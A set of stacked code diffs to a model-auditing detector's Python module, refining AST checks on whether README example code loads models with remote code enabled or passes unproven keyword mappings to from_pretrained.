@@ -2252,9 +2252,11 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             if node not in requests_calls and node.func.attr not in documented_attribute_calls:
                 return False
             if node.func.attr == "from_pretrained" and any(
-                keyword.arg == "trust_remote_code"
-                and isinstance(keyword.value, ast.Constant)
-                and keyword.value.value is True
+                keyword.arg is None
+                or (
+                    keyword.arg == "trust_remote_code"
+                    and (not isinstance(keyword.value, ast.Constant) or keyword.value.value is not False)
+                )
                 for keyword in node.keywords
             ):
                 return False

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2911,7 +2911,7 @@ def _is_valid_official_readme_sample_image_example(
     mapping_alias_targets = {
         id(binding_node): frozenset(target_names) for binding_node, target_names, _source_name in mapping_alias_groups
     }
-    mapping_transfer_alias_sources: dict[int, str] = {}
+    mapping_transfer_alias_sources: dict[int, frozenset[str]] = {}
 
     def alias_state_after_edge(
         binding_node: ast.AST,
@@ -2931,12 +2931,12 @@ def _is_valid_official_readme_sample_image_example(
             )
         if operation_definitely_follows_reference(binding_node, reference):
             binding_value = binding_node.value if isinstance(binding_node, (ast.Assign, ast.AnnAssign)) else None
-            binding_source_name = (
-                binding_value.id
+            binding_source_names = (
+                frozenset({binding_value.id})
                 if isinstance(binding_value, ast.Name)
-                else mapping_transfer_alias_sources.get(id(binding_node))
+                else mapping_transfer_alias_sources.get(id(binding_node), frozenset())
             )
-            if binding_source_name != current_name:
+            if current_name not in binding_source_names:
                 return None
             for write_node in name_write_nodes.get(current_name, []):
                 if node_is_within(write_node, reference) or node_is_within(write_node, binding_node):
@@ -3015,38 +3015,46 @@ def _is_valid_official_readme_sample_image_example(
                     return False
         return True
 
-    expanded_mapping_aliases: list[tuple[ast.AST, str, str]] = []
-    remaining_alias_expansion_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
-    for binding_node, group_target_names, source_name in sorted(
-        mapping_alias_groups,
-        key=lambda item: (getattr(item[0], "lineno", 0), getattr(item[0], "col_offset", 0)),
-    ):
-        source_component = {source_name} if source_name is not None else set()
-        pending_source_names = [source_name] if source_name is not None else []
-        while pending_source_names:
-            current_name = pending_source_names.pop()
-            for prior_binding, first_name, second_name in expanded_mapping_aliases:
-                if remaining_alias_expansion_steps <= 0:
-                    return False
-                remaining_alias_expansion_steps -= 1
-                if current_name not in {first_name, second_name} or not alias_edge_survives_until_reference(
-                    prior_binding,
-                    first_name,
-                    second_name,
-                    binding_node,
-                ):
-                    continue
-                alias_name = second_name if current_name == first_name else first_name
-                if alias_name in source_component:
-                    continue
-                source_component.add(alias_name)
-                pending_source_names.append(alias_name)
-        identity_names = list(dict.fromkeys((*group_target_names, *sorted(source_component))))
-        for first_index, first_name in enumerate(identity_names):
-            for second_name in identity_names[first_index + 1 :]:
-                if len(expanded_mapping_aliases) >= _MAX_README_IMAGE_EXAMPLE_AST_NODES:
-                    return False
-                expanded_mapping_aliases.append((binding_node, first_name, second_name))
+    def expand_mapping_alias_groups(
+        alias_groups: list[tuple[ast.AST, tuple[str, ...], str | None]],
+    ) -> list[tuple[ast.AST, str, str]] | None:
+        expanded_aliases: list[tuple[ast.AST, str, str]] = []
+        remaining_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
+        for binding_node, group_target_names, source_name in sorted(
+            alias_groups,
+            key=lambda item: (getattr(item[0], "lineno", 0), getattr(item[0], "col_offset", 0)),
+        ):
+            source_component = {source_name} if source_name is not None else set()
+            pending_source_names = [source_name] if source_name is not None else []
+            while pending_source_names:
+                current_name = pending_source_names.pop()
+                for prior_binding, first_name, second_name in expanded_aliases:
+                    if remaining_steps <= 0:
+                        return None
+                    remaining_steps -= 1
+                    if current_name not in {first_name, second_name} or not alias_edge_survives_until_reference(
+                        prior_binding,
+                        first_name,
+                        second_name,
+                        binding_node,
+                    ):
+                        continue
+                    alias_name = second_name if current_name == first_name else first_name
+                    if alias_name in source_component:
+                        continue
+                    source_component.add(alias_name)
+                    pending_source_names.append(alias_name)
+            identity_names = list(dict.fromkeys((*group_target_names, *sorted(source_component))))
+            for first_index, first_name in enumerate(identity_names):
+                for second_name in identity_names[first_index + 1 :]:
+                    if len(expanded_aliases) >= _MAX_README_IMAGE_EXAMPLE_AST_NODES:
+                        return None
+                    expanded_aliases.append((binding_node, first_name, second_name))
+        return expanded_aliases
+
+    expanded_mapping_aliases = expand_mapping_alias_groups(mapping_alias_groups)
+    if expanded_mapping_aliases is None:
+        return False
     mapping_aliases = expanded_mapping_aliases
 
     aliased_mapping_names = set(mapping_bindings)
@@ -3640,10 +3648,27 @@ def _is_valid_official_readme_sample_image_example(
             proven_mapping_transfer_call_ids=candidate_transfer_call_ids,
         ):
             return None
-        mapping_transfer_alias_sources[id(binding_node)] = unwrapped_value.id
+
+        candidate_alias_group = (binding_node, (binding_name,), unwrapped_value.id)
+        candidate_mapping_aliases = expand_mapping_alias_groups([*mapping_alias_groups, candidate_alias_group])
+        if candidate_mapping_aliases is None:
+            return None
+        transfer_source_names = frozenset(
+            alias_name
+            for alias_binding, first_name, second_name in candidate_mapping_aliases
+            if alias_binding is binding_node
+            for alias_name in (first_name, second_name)
+            if alias_name != binding_name
+        )
+        if unwrapped_value.id not in transfer_source_names:
+            return None
+
+        mapping_transfer_alias_sources[id(binding_node)] = transfer_source_names
         mapping_alias_targets[id(binding_node)] = frozenset({binding_name})
         mapping_alias_target_names.add(binding_name)
-        mapping_aliases.append((binding_node, unwrapped_value.id, binding_name))
+        mapping_alias_groups.append(candidate_alias_group)
+        mapping_aliases[:] = candidate_mapping_aliases
+        aliased_mapping_names.update((*transfer_source_names, binding_name))
         return (id(binding_node),)
 
     def conditional_mapping_test_is_proven_inert(test: ast.expr, binding_node: ast.AST) -> bool:

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2107,16 +2107,17 @@ def _remote_code_mapping_is_proven_safe(
                 result = False
             else:
                 candidates = bindings.get(current.id, [])
-                if len(candidates) != 1:
+                if not candidates:
                     result = False
                 else:
-                    binding_position, binding_value = candidates[0]
-                    result = binding_position < call_position and visit(
-                        binding_value,
-                        resolving | {current.id},
+                    result = all(
+                        binding_position < call_position and visit(binding_value, resolving | {current.id})
+                        for binding_position, binding_value in candidates
                     )
         elif isinstance(current, ast.Call):
             result = node_id in proven_mapping_call_ids
+        elif isinstance(current, ast.BinOp) and isinstance(current.op, ast.BitOr):
+            result = visit(current.left, resolving) and visit(current.right, resolving)
         elif isinstance(current, ast.Dict):
             result = True
             for key, item_value in zip(current.keys, current.values, strict=True):
@@ -2346,7 +2347,10 @@ def _is_valid_official_readme_sample_image_example(
                     modeled_name_write_ids.setdefault(target.id, set()).add(id(target))
         if (
             not isinstance(parents.get(id(binding_node)), ast.Module)
-            and isinstance(binding_node.value, (ast.Call, ast.Dict))
+            and (
+                isinstance(binding_node.value, (ast.Call, ast.Dict))
+                or (isinstance(binding_node.value, ast.BinOp) and isinstance(binding_node.value.op, ast.BitOr))
+            )
             and len(targets) == 1
             and isinstance(targets[0], ast.Name)
         ):
@@ -2494,6 +2498,79 @@ def _is_valid_official_readme_sample_image_example(
 
     def mapping_binding_position_at_call(binding: ast.AST, call: ast.Call) -> int:
         return binding_position_at_reference(binding, call)
+
+    def exhaustive_mapping_branch_bindings_precede_call(
+        mapping_name: str,
+        candidates: list[tuple[ast.AST, ast.expr]],
+        write_nodes: list[ast.AST],
+        call: ast.Call,
+    ) -> bool:
+        if len(candidates) != 2 or len(write_nodes) != 2 or execution_may_be_deferred(call):
+            return False
+
+        branch: ast.If | None = None
+        branch_fields: set[str] = set()
+        binding_targets: set[int] = set()
+        for binding_node, binding_value in candidates:
+            if not is_single_name_binding(binding_node, binding_value, mapping_name):
+                return False
+            if isinstance(binding_node, ast.Assign):
+                target = binding_node.targets[0]
+            elif isinstance(binding_node, ast.AnnAssign):
+                target = binding_node.target
+            else:
+                return False
+            if not isinstance(target, ast.Name):
+                return False
+            binding_targets.add(id(target))
+
+            membership = statement_memberships.get(id(binding_node))
+            if membership is None or membership[3] is not binding_node:
+                return False
+            container, field_name, _statement_index, _statement = membership
+            if not isinstance(container, ast.If) or field_name not in {"body", "orelse"}:
+                return False
+            if branch is None:
+                branch = container
+            elif branch is not container:
+                return False
+            branch_fields.add(field_name)
+
+        if branch is None or branch_fields != {"body", "orelse"}:
+            return False
+        if binding_targets != {id(write_node) for write_node in write_nodes}:
+            return False
+
+        branch_membership = statement_memberships.get(id(branch))
+        call_membership = direct_statement_membership(call)
+        if branch_membership is None or call_membership is None:
+            return False
+        branch_container, branch_field, branch_index, branch_statement = branch_membership
+        call_container, call_field, call_index, call_statement = call_membership
+        if (
+            branch_statement is not branch
+            or branch_container is not call_container
+            or branch_field != call_field
+            or branch_index >= call_index
+            or not isinstance(call_statement, ast.Expr)
+            or call_statement.value is not call
+        ):
+            return False
+        if isinstance(branch_container, ast.Module):
+            return True
+        return (
+            isinstance(branch_container, ast.With)
+            and branch_field == "body"
+            and is_canonical_no_grad_with(branch_container)
+            and isinstance(parents.get(id(branch_container)), ast.Module)
+            and any(
+                isinstance(statement, ast.Import)
+                and any(alias.name == "torch" and alias.asname is None for alias in statement.names)
+                and top_level_statement_precedes(statement, branch_container)
+                for statement in tree.body
+            )
+            and not name_write_nodes.get("torch")
+        )
 
     def operation_may_affect_reference(operation: ast.AST, reference: ast.AST) -> bool:
         if execution_may_be_deferred(reference):
@@ -2736,7 +2813,13 @@ def _is_valid_official_readme_sample_image_example(
     for _binding_node, first_name, second_name in mapping_aliases:
         aliased_mapping_names.update((first_name, second_name))
 
-    def is_proven_mapping_use(node: ast.Name, proven_mapping_transfer_call_ids: frozenset[int]) -> bool:
+    def is_proven_mapping_use(
+        node: ast.Name,
+        proven_mapping_transfer_call_ids: frozenset[int],
+        proven_union_operand_ids: frozenset[int],
+    ) -> bool:
+        if id(node) in proven_union_operand_ids:
+            return True
         parent = parents.get(id(node))
         if (
             isinstance(parent, ast.Call)
@@ -2765,6 +2848,7 @@ def _is_valid_official_readme_sample_image_example(
 
     def unsafe_mapping_operations_for(
         proven_mapping_transfer_call_ids: frozenset[int],
+        proven_union_operand_ids: frozenset[int],
     ) -> list[tuple[str, ast.AST]]:
         operations: list[tuple[str, ast.AST]] = [
             (node.id, node)
@@ -2772,7 +2856,7 @@ def _is_valid_official_readme_sample_image_example(
             if isinstance(node, ast.Name)
             and isinstance(node.ctx, ast.Load)
             and node.id in aliased_mapping_names
-            and not is_proven_mapping_use(node, proven_mapping_transfer_call_ids)
+            and not is_proven_mapping_use(node, proven_mapping_transfer_call_ids, proven_union_operand_ids)
         ]
         operations.extend(
             (node.target.id, node)
@@ -2808,12 +2892,21 @@ def _is_valid_official_readme_sample_image_example(
         }
         relevant_bindings: dict[str, list[tuple[int, ast.expr]]] = {}
         relevant_binding_counts: Counter[str] = Counter()
+        call_position = top_level_statement_indices[id(call)]
         for name, candidates in relevant_binding_nodes.items():
             logical_candidates = candidates
             logical_write_count = len(relevant_name_writes.get(name, []))
+            exhaustive_branch_join = exhaustive_mapping_branch_bindings_precede_call(
+                name,
+                candidates,
+                relevant_name_writes.get(name, []),
+                call,
+            )
             if candidates:
                 binding_chain = binding_chains.get(id(candidates[-1][0]))
-                if (
+                if exhaustive_branch_join:
+                    logical_write_count = 1
+                elif (
                     binding_chain is not None
                     and tuple(id(binding_node) for binding_node, _binding_value in candidates) == binding_chain
                     and name_writes_match_binding_chain(relevant_name_writes.get(name, []), binding_chain)
@@ -2821,15 +2914,59 @@ def _is_valid_official_readme_sample_image_example(
                     logical_candidates = [candidates[-1]]
                     logical_write_count = 1
             relevant_bindings[name] = [
-                (mapping_binding_position_at_call(binding_node, call), binding_value)
+                (
+                    call_position - 1
+                    if exhaustive_branch_join
+                    else mapping_binding_position_at_call(binding_node, call),
+                    binding_value,
+                )
                 for binding_node, binding_value in logical_candidates
             ]
             relevant_binding_counts[name] = logical_write_count
         for name, write_nodes in relevant_name_writes.items():
             relevant_binding_counts.setdefault(name, len(write_nodes))
+
+        def proven_union_operand_ids_for(mapping_value: ast.expr) -> frozenset[int]:
+            remaining_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
+            seen: set[int] = set()
+            operand_ids: set[int] = set()
+            pending: list[ast.expr] = [mapping_value]
+            while pending:
+                if remaining_steps <= 0:
+                    return frozenset()
+                remaining_steps -= 1
+                current = pending.pop()
+                current_id = id(current)
+                if current_id in seen:
+                    continue
+                seen.add(current_id)
+                if isinstance(current, ast.Name):
+                    if relevant_binding_counts[current.id] != 1:
+                        continue
+                    pending.extend(
+                        binding_value
+                        for binding_position, binding_value in relevant_bindings.get(current.id, [])
+                        if binding_position < call_position
+                    )
+                elif isinstance(current, ast.BinOp) and isinstance(current.op, ast.BitOr):
+                    if isinstance(current.left, ast.Name):
+                        operand_ids.add(id(current.left))
+                    if isinstance(current.right, ast.Name):
+                        operand_ids.add(id(current.right))
+                    pending.extend((current.left, current.right))
+                elif isinstance(current, ast.Dict):
+                    pending.extend(
+                        item_value for key, item_value in zip(current.keys, current.values, strict=True) if key is None
+                    )
+            return frozenset(operand_ids)
+
+        proven_union_operand_ids = proven_union_operand_ids_for(value)
         unsafe_names: set[str] = set()
         remaining_alias_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
-        for name, operation in unsafe_mapping_operations_for(proven_mapping_transfer_call_ids):
+        for name, operation in unsafe_mapping_operations_for(
+            proven_mapping_transfer_call_ids,
+            proven_union_operand_ids,
+        ):
             if not mapping_operation_may_affect_call(operation, call):
                 continue
             operation_unsafe_names = {name}
@@ -2876,7 +3013,7 @@ def _is_valid_official_readme_sample_image_example(
             binding_counts=relevant_binding_counts,
             unsafe_names=frozenset(unsafe_names),
             proven_mapping_call_ids=proven_mapping_call_ids,
-            call_position=top_level_statement_indices[id(call)],
+            call_position=call_position,
         )
 
     def call_has_only_proven_safe_mapping_arguments(value: ast.Call) -> bool:

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2378,6 +2378,18 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
 
     def is_proven_mapping_use(node: ast.Name, proven_mapping_transfer_call_ids: frozenset[int]) -> bool:
         parent = parents.get(id(node))
+        if (
+            isinstance(parent, ast.Call)
+            and len(parent.args) == 1
+            and parent.args[0] is node
+            and not parent.keywords
+            and isinstance(parent.func, ast.Name)
+            and parent.func.id == "len"
+            and not any(
+                mapping_operation_may_affect_call(write_node, parent) for write_node in name_write_nodes.get("len", [])
+            )
+        ):
+            return True
         if isinstance(parent, ast.Attribute) and parent.value is node and parent.attr == "to":
             transfer_call = parents.get(id(parent))
             return isinstance(transfer_call, ast.Call) and id(transfer_call) in proven_mapping_transfer_call_ids
@@ -2651,6 +2663,39 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         proven_mapping_binding_chains[id(binding_node)] = binding_chain
         proven_mapping_call_id_set.add(id(binding_value))
         proven_mapping_transfer_call_id_set.update(id(transfer_call) for transfer_call in transfer_calls)
+
+    standalone_transfer_calls = sorted(
+        (node.value for node in nodes if isinstance(node, ast.Expr) and isinstance(node.value, ast.Call)),
+        key=lambda call: top_level_statement_indices.get(id(call), len(tree.body)),
+    )
+    for transfer_call in standalone_transfer_calls:
+        if call_execution_may_be_deferred(transfer_call):
+            continue
+        unwrapped_mapping = unwrap_safe_mapping_device_transfers(transfer_call, transfer_call)
+        if unwrapped_mapping is None:
+            continue
+        mapping_value, transfer_calls = unwrapped_mapping
+        if not transfer_calls or not isinstance(mapping_value, ast.Name):
+            continue
+        prior_bindings = [
+            prior_binding
+            for prior_binding, _prior_value in mapping_bindings.get(mapping_value.id, [])
+            if top_level_statement_precedes(prior_binding, transfer_call)
+        ]
+        if not prior_bindings or id(prior_bindings[-1]) not in proven_mapping_binding_chains:
+            continue
+        candidate_transfer_call_ids = frozenset(
+            proven_mapping_transfer_call_id_set | {id(candidate) for candidate in transfer_calls}
+        )
+        if not remote_code_mapping_is_proven_safe_at_call(
+            mapping_value,
+            transfer_call,
+            proven_mapping_call_ids=frozenset(proven_mapping_call_id_set),
+            proven_mapping_binding_chains=proven_mapping_binding_chains,
+            proven_mapping_transfer_call_ids=candidate_transfer_call_ids,
+        ):
+            continue
+        proven_mapping_transfer_call_id_set.update(id(candidate) for candidate in transfer_calls)
 
     for generate_call in nodes:
         if (

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2340,10 +2340,155 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             return False
         return isinstance(target, ast.Name) and (expected_name is None or target.id == expected_name)
 
-    def call_has_only_explicit_safe_mapping_arguments(value: ast.Call) -> bool:
+    def name_writes_match_binding_chain(write_nodes: list[ast.AST], binding_chain: tuple[int, ...]) -> bool:
+        write_indices = [top_level_statement_indices.get(id(write_node)) for write_node in write_nodes]
+        binding_indices = [top_level_statement_indices.get(binding_id) for binding_id in binding_chain]
+        return (
+            None not in write_indices
+            and None not in binding_indices
+            and Counter(write_indices) == Counter(binding_indices)
+        )
+
+    def call_execution_may_be_deferred(call: ast.Call) -> bool:
+        current: ast.AST = call
+        while parent := parents.get(id(current)):
+            if isinstance(parent, ast.GeneratorExp):
+                return True
+            if isinstance(parent, ast.Lambda) and current is parent.body:
+                return True
+            if isinstance(parent, (ast.FunctionDef, ast.AsyncFunctionDef)) and any(
+                current is statement for statement in parent.body
+            ):
+                return True
+            current = parent
+        return False
+
+    def mapping_operation_may_affect_call(operation: ast.AST, call: ast.Call) -> bool:
+        if call_execution_may_be_deferred(call):
+            return True
+        if getattr(operation, "lineno", None) == call.lineno:
+            return True
+        operation_index = top_level_statement_indices.get(id(operation))
+        call_index = top_level_statement_indices.get(id(call))
+        return operation_index is None or call_index is None or operation_index <= call_index
+
+    aliased_mapping_names = set(mapping_bindings)
+    for _binding_node, first_name, second_name in mapping_aliases:
+        aliased_mapping_names.update((first_name, second_name))
+
+    def is_proven_mapping_use(node: ast.Name, proven_mapping_transfer_call_ids: frozenset[int]) -> bool:
+        parent = parents.get(id(node))
+        if isinstance(parent, ast.Attribute) and parent.value is node and parent.attr == "to":
+            transfer_call = parents.get(id(parent))
+            return isinstance(transfer_call, ast.Call) and id(transfer_call) in proven_mapping_transfer_call_ids
+        if isinstance(parent, ast.keyword):
+            return parent.arg is None and parent.value is node
+        if isinstance(parent, ast.Dict):
+            return any(
+                key is None and item_value is node for key, item_value in zip(parent.keys, parent.values, strict=True)
+            )
+        if isinstance(parent, ast.Assign):
+            return parent.value is node and all(isinstance(target, ast.Name) for target in parent.targets)
+        return isinstance(parent, ast.AnnAssign) and parent.value is node and isinstance(parent.target, ast.Name)
+
+    def unsafe_mapping_operations_for(
+        proven_mapping_transfer_call_ids: frozenset[int],
+    ) -> list[tuple[str, ast.AST]]:
+        operations: list[tuple[str, ast.AST]] = [
+            (node.id, node)
+            for node in nodes
+            if isinstance(node, ast.Name)
+            and isinstance(node.ctx, ast.Load)
+            and node.id in aliased_mapping_names
+            and not is_proven_mapping_use(node, proven_mapping_transfer_call_ids)
+        ]
+        operations.extend(
+            (node.target.id, node)
+            for node in nodes
+            if isinstance(node, ast.AugAssign)
+            and isinstance(node.target, ast.Name)
+            and node.target.id in aliased_mapping_names
+        )
+        return operations
+
+    def remote_code_mapping_is_proven_safe_at_call(
+        value: ast.expr,
+        call: ast.Call,
+        *,
+        proven_mapping_call_ids: frozenset[int] = frozenset(),
+        proven_mapping_binding_chains: dict[int, tuple[int, ...]] | None = None,
+        proven_mapping_transfer_call_ids: frozenset[int] = frozenset(),
+    ) -> bool:
+        binding_chains = proven_mapping_binding_chains or {}
+        relevant_binding_nodes = {
+            name: [
+                (binding_node, binding_value)
+                for binding_node, binding_value in candidates
+                if mapping_operation_may_affect_call(binding_node, call)
+            ]
+            for name, candidates in mapping_bindings.items()
+        }
+        relevant_name_writes = {
+            name: [write_node for write_node in write_nodes if mapping_operation_may_affect_call(write_node, call)]
+            for name, write_nodes in name_write_nodes.items()
+        }
+        relevant_bindings: dict[str, list[tuple[int, ast.expr]]] = {}
+        relevant_binding_counts: Counter[str] = Counter()
+        for name, candidates in relevant_binding_nodes.items():
+            logical_candidates = candidates
+            logical_write_count = len(relevant_name_writes.get(name, []))
+            if candidates:
+                binding_chain = binding_chains.get(id(candidates[-1][0]))
+                if (
+                    binding_chain is not None
+                    and tuple(id(binding_node) for binding_node, _binding_value in candidates) == binding_chain
+                    and name_writes_match_binding_chain(relevant_name_writes.get(name, []), binding_chain)
+                ):
+                    logical_candidates = [candidates[-1]]
+                    logical_write_count = 1
+            relevant_bindings[name] = [
+                (top_level_statement_indices[id(binding_node)], binding_value)
+                for binding_node, binding_value in logical_candidates
+            ]
+            relevant_binding_counts[name] = logical_write_count
+        for name, write_nodes in relevant_name_writes.items():
+            relevant_binding_counts.setdefault(name, len(write_nodes))
+        relevant_aliases: dict[str, set[str]] = {}
+        for binding_node, first_name, second_name in mapping_aliases:
+            if not mapping_operation_may_affect_call(binding_node, call):
+                continue
+            relevant_aliases.setdefault(first_name, set()).add(second_name)
+            relevant_aliases.setdefault(second_name, set()).add(first_name)
+        unsafe_names = {
+            name
+            for name, operation in unsafe_mapping_operations_for(proven_mapping_transfer_call_ids)
+            if mapping_operation_may_affect_call(operation, call)
+        }
+        pending_unsafe_names = list(unsafe_names)
+        while pending_unsafe_names:
+            unsafe_name = pending_unsafe_names.pop()
+            for alias_name in relevant_aliases.get(unsafe_name, set()):
+                if alias_name in unsafe_names:
+                    continue
+                unsafe_names.add(alias_name)
+                pending_unsafe_names.append(alias_name)
+
+        return _remote_code_mapping_is_proven_safe(
+            value,
+            bindings=relevant_bindings,
+            binding_counts=relevant_binding_counts,
+            unsafe_names=frozenset(unsafe_names),
+            proven_mapping_call_ids=proven_mapping_call_ids,
+            call_position=top_level_statement_indices[id(call)],
+        )
+
+    def call_has_only_proven_safe_mapping_arguments(value: ast.Call) -> bool:
         return (
             not any(isinstance(argument, ast.Starred) for argument in value.args)
-            and not any(keyword.arg is None for keyword in value.keywords)
+            and not any(
+                keyword.arg is None and not remote_code_mapping_is_proven_safe_at_call(keyword.value, value)
+                for keyword in value.keywords
+            )
             and not any(
                 keyword.arg in _REMOTE_CODE_KEYWORDS and not _remote_code_option_is_disabled(keyword.arg, keyword.value)
                 for keyword in value.keywords
@@ -2369,7 +2514,7 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         instance_binding, factory_call = instance_bindings[0]
         return (
             isinstance(factory_call, ast.Call)
-            and call_has_only_explicit_safe_mapping_arguments(factory_call)
+            and call_has_only_proven_safe_mapping_arguments(factory_call)
             and is_single_name_binding(instance_binding, factory_call, instance_name)
             and isinstance(factory_call.func, ast.Attribute)
             and factory_call.func.attr == "from_pretrained"
@@ -2420,30 +2565,27 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             and isinstance(mapping_value.func, ast.Attribute)
             and mapping_value.func.attr == "to"
         ):
-            if (
-                len(mapping_value.args) != 1
-                or mapping_value.keywords
-                or not mapping_device_is_proven_safe(mapping_value.args[0], binding_node)
+            if len(mapping_value.args) == 1 and not mapping_value.keywords:
+                device_value = mapping_value.args[0]
+            elif (
+                not mapping_value.args
+                and len(mapping_value.keywords) == 1
+                and mapping_value.keywords[0].arg == "device"
             ):
+                device_value = mapping_value.keywords[0].value
+            else:
+                return None
+            if not mapping_device_is_proven_safe(device_value, binding_node):
                 return None
             transfers.append(mapping_value)
             mapping_value = mapping_value.func.value
         return mapping_value, tuple(transfers)
 
-    def name_writes_match_binding_chain(write_nodes: list[ast.AST], binding_chain: tuple[int, ...]) -> bool:
-        write_indices = [top_level_statement_indices.get(id(write_node)) for write_node in write_nodes]
-        binding_indices = [top_level_statement_indices.get(binding_id) for binding_id in binding_chain]
-        return (
-            None not in write_indices
-            and None not in binding_indices
-            and Counter(write_indices) == Counter(binding_indices)
-        )
-
     def trusted_mapping_factory_call_is_proven_safe(binding_node: ast.AST, mapping_value: ast.expr) -> bool:
         if (
             not isinstance(mapping_value, ast.Call)
             or not isinstance(mapping_value.func, ast.Name)
-            or not call_has_only_explicit_safe_mapping_arguments(mapping_value)
+            or not call_has_only_proven_safe_mapping_arguments(mapping_value)
         ):
             return False
         return trusted_transformers_instance_is_proven_safe(
@@ -2453,7 +2595,7 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         )
 
     proven_mapping_call_id_set: set[int] = set()
-    proven_mapping_transfer_call_ids: set[int] = set()
+    proven_mapping_transfer_call_id_set: set[int] = set()
     proven_mapping_binding_chains: dict[int, tuple[int, ...]] = {}
     ordered_mapping_bindings = sorted(
         (
@@ -2500,126 +2642,9 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             continue
         proven_mapping_binding_chains[id(binding_node)] = binding_chain
         proven_mapping_call_id_set.add(id(binding_value))
-        proven_mapping_transfer_call_ids.update(id(transfer_call) for transfer_call in transfer_calls)
+        proven_mapping_transfer_call_id_set.update(id(transfer_call) for transfer_call in transfer_calls)
     proven_mapping_call_ids = frozenset(proven_mapping_call_id_set)
-
-    def is_proven_mapping_use(node: ast.Name) -> bool:
-        parent = parents.get(id(node))
-        if isinstance(parent, ast.Attribute) and parent.value is node and parent.attr == "to":
-            transfer_call = parents.get(id(parent))
-            return isinstance(transfer_call, ast.Call) and id(transfer_call) in proven_mapping_transfer_call_ids
-        if isinstance(parent, ast.keyword):
-            return parent.arg is None and parent.value is node
-        if isinstance(parent, ast.Dict):
-            return any(
-                key is None and item_value is node for key, item_value in zip(parent.keys, parent.values, strict=True)
-            )
-        if isinstance(parent, ast.Assign):
-            return parent.value is node and all(isinstance(target, ast.Name) for target in parent.targets)
-        return isinstance(parent, ast.AnnAssign) and parent.value is node and isinstance(parent.target, ast.Name)
-
-    aliased_mapping_names = set(mapping_bindings)
-    for _binding_node, first_name, second_name in mapping_aliases:
-        aliased_mapping_names.update((first_name, second_name))
-    unsafe_mapping_operations: list[tuple[str, ast.AST]] = [
-        (node.id, node)
-        for node in nodes
-        if isinstance(node, ast.Name)
-        and isinstance(node.ctx, ast.Load)
-        and node.id in aliased_mapping_names
-        and not is_proven_mapping_use(node)
-    ]
-    unsafe_mapping_operations.extend(
-        (node.target.id, node)
-        for node in nodes
-        if isinstance(node, ast.AugAssign)
-        and isinstance(node.target, ast.Name)
-        and node.target.id in aliased_mapping_names
-    )
-
-    def call_execution_may_be_deferred(call: ast.Call) -> bool:
-        current: ast.AST = call
-        while parent := parents.get(id(current)):
-            if isinstance(parent, ast.GeneratorExp):
-                return True
-            if isinstance(parent, ast.Lambda) and current is parent.body:
-                return True
-            if isinstance(parent, (ast.FunctionDef, ast.AsyncFunctionDef)) and any(
-                current is statement for statement in parent.body
-            ):
-                return True
-            current = parent
-        return False
-
-    def mapping_operation_may_affect_call(operation: ast.AST, call: ast.Call) -> bool:
-        if call_execution_may_be_deferred(call):
-            return True
-        if getattr(operation, "lineno", None) == call.lineno:
-            return True
-        operation_index = top_level_statement_indices.get(id(operation))
-        call_index = top_level_statement_indices.get(id(call))
-        return operation_index is None or call_index is None or operation_index <= call_index
-
-    def remote_code_mapping_is_proven_safe_at_call(value: ast.expr, call: ast.Call) -> bool:
-        relevant_binding_nodes = {
-            name: [
-                (binding_node, binding_value)
-                for binding_node, binding_value in candidates
-                if mapping_operation_may_affect_call(binding_node, call)
-            ]
-            for name, candidates in mapping_bindings.items()
-        }
-        relevant_name_writes = {
-            name: [write_node for write_node in write_nodes if mapping_operation_may_affect_call(write_node, call)]
-            for name, write_nodes in name_write_nodes.items()
-        }
-        relevant_bindings: dict[str, list[tuple[int, ast.expr]]] = {}
-        relevant_binding_counts: Counter[str] = Counter()
-        for name, candidates in relevant_binding_nodes.items():
-            logical_candidates = candidates
-            logical_write_count = len(relevant_name_writes.get(name, []))
-            if candidates:
-                binding_chain = proven_mapping_binding_chains.get(id(candidates[-1][0]))
-                if (
-                    binding_chain is not None
-                    and tuple(id(binding_node) for binding_node, _binding_value in candidates) == binding_chain
-                    and name_writes_match_binding_chain(relevant_name_writes.get(name, []), binding_chain)
-                ):
-                    logical_candidates = [candidates[-1]]
-                    logical_write_count = 1
-            relevant_bindings[name] = [
-                (top_level_statement_indices[id(binding_node)], binding_value)
-                for binding_node, binding_value in logical_candidates
-            ]
-            relevant_binding_counts[name] = logical_write_count
-        for name, write_nodes in relevant_name_writes.items():
-            relevant_binding_counts.setdefault(name, len(write_nodes))
-        relevant_aliases: dict[str, set[str]] = {}
-        for binding_node, first_name, second_name in mapping_aliases:
-            if not mapping_operation_may_affect_call(binding_node, call):
-                continue
-            relevant_aliases.setdefault(first_name, set()).add(second_name)
-            relevant_aliases.setdefault(second_name, set()).add(first_name)
-        unsafe_names = {
-            name for name, operation in unsafe_mapping_operations if mapping_operation_may_affect_call(operation, call)
-        }
-        pending_unsafe_names = list(unsafe_names)
-        while pending_unsafe_names:
-            unsafe_name = pending_unsafe_names.pop()
-            for alias_name in relevant_aliases.get(unsafe_name, set()):
-                if alias_name in unsafe_names:
-                    continue
-                unsafe_names.add(alias_name)
-                pending_unsafe_names.append(alias_name)
-
-        return _remote_code_mapping_is_proven_safe(
-            value,
-            bindings=relevant_bindings,
-            binding_counts=relevant_binding_counts,
-            unsafe_names=frozenset(unsafe_names),
-            proven_mapping_call_ids=proven_mapping_call_ids,
-            call_position=top_level_statement_indices[id(call)],
-        )
+    proven_mapping_transfer_call_ids = frozenset(proven_mapping_transfer_call_id_set)
 
     for node in nodes:
         if isinstance(node, ast.Import):
@@ -2702,7 +2727,13 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
                     keyword.value,
